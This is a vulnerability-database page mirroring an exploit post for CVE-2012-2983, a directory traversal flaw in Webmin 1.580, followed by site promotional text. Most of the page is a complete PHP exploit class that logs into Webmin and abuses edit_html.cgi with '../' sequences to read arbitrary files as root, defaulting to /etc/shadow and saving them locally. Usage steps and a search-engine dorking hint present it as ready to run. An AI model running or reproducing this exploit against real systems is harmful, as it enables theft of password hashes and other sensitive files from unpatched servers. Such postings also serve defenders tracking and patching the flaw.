Vulners
Lucene search
Webmin 1.580 Directory Traversal
šļøĀ 12 Mar 2025Ā 00:00:00Reported byĀ indoushkaTypeĀ 
Ā packetstormšĀ packetstorm.newsšĀ 363Ā Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Webmin <= 1.580 Multiple Input-Validation Vulnerabilities (deprecated) | 1 May 201300:00 | ā | nessus |
| Mandriva Linux Security Advisory : webmin (MDVSA-2014:062) | 18 Mar 201400:00 | ā | nessus |
| Webmin <= 1.590 Multiple Vulnerabilities | 19 Sep 201800:00 | ā | nessus |
 | CVE-2012-2983 | 29 May 201815:50 | ā | circl |
 | Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access (CVE-2012-2983) | 8 Jan 201300:00 | ā | checkpoint_advisories |
 | CVE-2012-2983 | 11 Sep 201218:00 | ā | cve |
 | CVE-2012-2983 | 11 Sep 201218:00 | ā | cvelist |
 | Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access | 15 Sep 201213:11 | ā | metasploit |
 | CVE-2012-2983 | 11 Sep 201218:55 | ā | nvd |
 | FreeBSD Ports: webmin | 26 Nov 201200:00 | ā | openvas |
10
=============================================================================================================================================
| # Title : Webmin 1.580 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://webmin.com/ |
=============================================================================================================================================
POC :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] Code Description: This code is written in PHP and aims to exploit the Directory Traversal vulnerability in Webmin 1.580,
which allows an authenticated user with access to the File Manager Module to read any file on the system with root privileges.
(Related : https://packetstorm.news/files/id/180804/ Linked CVE numbers: CVE-2012-2983 ) .
[+] save code as poc.php.
[+] Set target : line 85
[+] PayLoad :
<?php
class WebminExploit {
private $host;
private $port;
private $username;
private $password;
private $depth;
private $rpath;
private $ssl;
private $session;
public function __construct($host, $port = 10000, $username, $password, $depth = 4, $rpath = "/etc/shadow", $ssl = true) {
$this->host = $host;
$this->port = $port;
$this->username = $username;
$this->password = $password;
$this->depth = $depth;
$this->rpath = $rpath;
$this->ssl = $ssl;
}
public function login() {
$url = ($this->ssl ? "https" : "http") . "://{$this->host}:{$this->port}/session_login.cgi";
$data = http_build_query([
"page" => "/",
"user" => $this->username,
"pass" => $this->password
]);
$opts = [
"http" => [
"method" => "POST",
"header" => "Content-Type: application/x-www-form-urlencoded\r\nCookie: testing=1\r\n",
"content" => $data
]
];
$context = stream_context_create($opts);
$response = file_get_contents($url, false, $context);
if (preg_match('/sid=(\w+);/', implode("\n", $http_response_header), $matches)) {
$this->session = $matches[1];
echo "Authentication successful\n";
return true;
}
echo "Authentication failed\n";
return false;
}
public function retrieveFile() {
if (!$this->session) {
echo "No valid session. Login first.\n";
return;
}
echo "Attempting to retrieve {$this->rpath}...\n";
$traversal = str_repeat("../", $this->depth) . $this->rpath;
$url = ($this->ssl ? "https" : "http") . "://{$this->host}:{$this->port}/file/edit_html.cgi?file={$traversal}&text=1";
$opts = [
"http" => [
"method" => "GET",
"header" => "Cookie: sid={$this->session}\r\n"
]
];
$context = stream_context_create($opts);
$response = file_get_contents($url, false, $context);
if (preg_match('/name=body>(.*?)<\/textarea>/s', $response, $matches)) {
$content = $matches[1];
$filename = basename($this->rpath);
file_put_contents($filename, $content);
echo "{$this->rpath} saved in {$filename}\n";
} else {
echo "Failed to retrieve the file\n";
}
}
}
// Ų§Ų³ŲŖŲ®ŲÆŲ§Ł
Ų§ŁŁŁŲ§Ų³
$exploit = new WebminExploit("target.com", 10000, "admin", "password");
if ($exploit->login()) {
$exploit->retrieveFile();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 25
EPSS0.53985